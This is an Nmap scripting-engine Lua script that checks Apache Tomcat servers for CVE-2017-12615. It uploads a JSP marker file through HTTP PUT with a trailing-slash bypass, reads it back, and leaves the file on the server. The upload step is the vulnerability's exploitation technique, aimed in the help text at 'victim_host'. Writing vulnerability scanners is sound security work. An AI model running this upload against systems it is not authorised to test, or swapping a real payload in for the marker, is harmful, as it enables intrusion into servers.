local stdnse = require "stdnse"
local http = require "http"
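-- Script help text shown by Nmap. The check below uploads a plain-text marker
-- (the string "CVE-2017-12615"), not an executable payload, and does not
-- delete it afterwards, so the text says so explicitly.
description = [[
Checks a web server for the Apache Tomcat vulnerability CVE-2017-12615
(JSP upload through HTTP PUT). This script writes a marker file named
/CVE-2017-12615-CHECK-<random>.jsp to the web server and reads it back.
The marker contains only the text "CVE-2017-12615". It is not removed by
the script and has to be deleted from the server after the scan.

$ git clone https://github.com/Rvn0xsy/nse_vuln.git
$ cd /nse_vuln/
$ sudo cp * /usr/share/nmap/scripts/
$ sudo nmap -p 80,8080,8090,8899 --script XX.NSE victim_host
]]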
--- Pre-scan rule. The body is empty, so it returns nothing (falsy).
function prerule()
end
--- Host rule. Always answers false, whatever host is passed.
-- @param host host table (unused)
-- @return false
function hostrule(host)
  return false
end
--- Port rule: selects the ports this script probes.
-- Returns true when port.number is 80, 8080, 8090 or 8899 and returns
-- nothing otherwise.
-- NOTE(review): only the port number is compared; port.protocol and
-- port.state are not looked at here.
-- @param host host table (unused)
-- @param port port table; only port.number is read
function portrule(host, port)
  local candidates = { [80] = true, [8080] = true, [8090] = true, [8899] = true }
  if candidates[port.number] then
    return true
  end
end
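--- Probes the target for CVE-2017-12615 by uploading a marker and reading it back.
--
-- Sends an HTTP PUT for "/CVE-2017-12615-CHECK-<n>.jsp/" (n comes from
-- math.random(9999)) with the body "CVE-2017-12615". If the server answers
-- 201, the same path without the trailing slash is fetched and the response
-- is searched for the marker text.
--
-- The uploaded marker is not removed by this function; the reported
-- shell_name is the path that has to be cleaned up on an affected server.
-- NOTE(review): a positive result means the server accepted a PUT for a .jsp
-- path; on Tomcat that is presumably the DefaultServlet running with its
-- `readonly` init-param set to false -- confirm against the deployment.
--
-- @param host host table passed in by NSE
-- @param port port table passed in by NSE
-- @return an stdnse output table with the field shell_name when the marker
--         was written and read back, otherwise false
action = function(host, port)
  local marker_path = string.format("%sCVE-2017-12615-CHECK-%d.jsp", "/", math.random(9999))
  local result = stdnse.output_table()

  local put_rsp = http.put(host, port, marker_path .. "/", nil, "CVE-2017-12615")
  -- Treat a missing response the same as a non-201 status.
  if not put_rsp or put_rsp.status ~= 201 then
    return false
  end

  result.shell_name = marker_path
  local response = http.get(host, port, marker_path)
  -- Require status 200 in addition to the marker text: the requested path
  -- itself contains "CVE-2017-12615", so an error page that echoes the path
  -- would otherwise be reported as a hit.
  if response and response.status == 200
      and http.response_contains(response, "CVE%-2017%-12615") then
    return result
  end
  return false
end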
--- Post-scan rule. The body is empty, so it returns nothing (falsy).
function postrule()
end